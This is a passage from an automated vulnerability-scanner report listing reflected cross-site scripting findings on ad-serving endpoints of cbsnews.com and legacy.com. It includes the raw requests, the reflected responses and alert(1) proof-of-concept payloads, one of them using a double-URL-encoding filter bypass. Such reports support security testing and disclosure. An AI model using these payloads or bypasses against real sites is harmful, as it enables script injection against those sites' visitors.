/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=5035448af49*/alert(1)//09dcc35bef3&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.206. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34 was submitted in the PAGESTATE parameter. This input was echoed as 420d4';alert(1)//5b6eccfcc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:21 GMT
Server: Apache/2.2
Content-Length: 1167
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=420d4%2527%253balert%25281%2529%252f%252f5b6eccfcc34&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PT
...[SNIP]...
den%252dUS&amp;ucat_rsi=%2526&amp;pg=&amp;t=2011.02.14.01.36.21/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='420d4';alert(1)//5b6eccfcc34';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw5.cnet.com::1348606272 2011.02.14.01.36.21 *//* MAC T 0.0.3.3 */

1.207. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload d6a51*/alert(1)//c1e9cd45c17 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2
Content-Length: 1122
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:36:23 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6a51*/alert(1)//c1e9cd45c17&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a
...[SNIP]...

1.208. http://mads.cbsnews.com/mac-ad [POS parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload c0f65<a>1fc0f8dcd22 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:35 GMT
Content-Length: 599

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100c0f65<a>1fc0f8dcd22&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80' CNET-PTYPE='00' POS='100c0f65a1fc0f8dcd22' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.209. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 93353*/alert(1)//10a6db2e038 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:52 GMT
Server: Apache/2.2
Content-Length: 1116
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=830193353*/alert(1)//10a6db2e038&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.210. http://mads.cbsnews.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into a JavaScript inline comment. The payload e911c*/alert(1)//dc43016cd59 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:46 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:37:46 GMT
Content-Length: 618

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162e911c*/alert(1)//dc43016cd59&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL
...[SNIP]...

1.211. http://mads.cbsnews.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload dc004<a>c7e5ad6dad5 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:36:24 GMT
Content-Length: 552

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162dc004<a>c7e5ad6dad5&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&
...[SNIP]...

1.212. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 4e95f*/alert(1)//b34259e989e was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: Apache/2.2
Content-Length: 1088
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Mon, 14 Feb 2011 01:37:54 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=14e95f*/alert(1)//b34259e989e&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.213. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 4d5b0*/alert(1)//4aaf1da79cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:12 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:12 GMT
Content-Length: 610

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=1&cookiesOn=1&4d5b0*/alert(1)//4aaf1da79cd=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101
...[SNIP]...

1.214. http://mads.cbsnews.com/mac-ad [x-cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 7ae8b*/alert(1)//a2655b7e480 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:05 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:05 GMT
Content-Length: 608

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=915017457ae8b*/alert(1)//a2655b7e480&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='8301' NCAT='250:503544:' CID='20031629' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1||;cbsnews
...[SNIP]...

1.215. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd83b"><script>alert(1)</script>a6532cd236c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframefd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addynfd83b"><script>alert(1)</script>a6532cd236c/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.216. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7704"><script>alert(1)</script>52919f7acc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0e7704"><script>alert(1)</script>52919f7acc/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.217. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b13"><script>alert(1)</script>96e07070135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1a6b13"><script>alert(1)</script>96e07070135/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.218. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228ac"><script>alert(1)</script>727f9da3634 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112228ac"><script>alert(1)</script>727f9da3634/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.219. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9f27"><script>alert(1)</script>1f3976d245b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
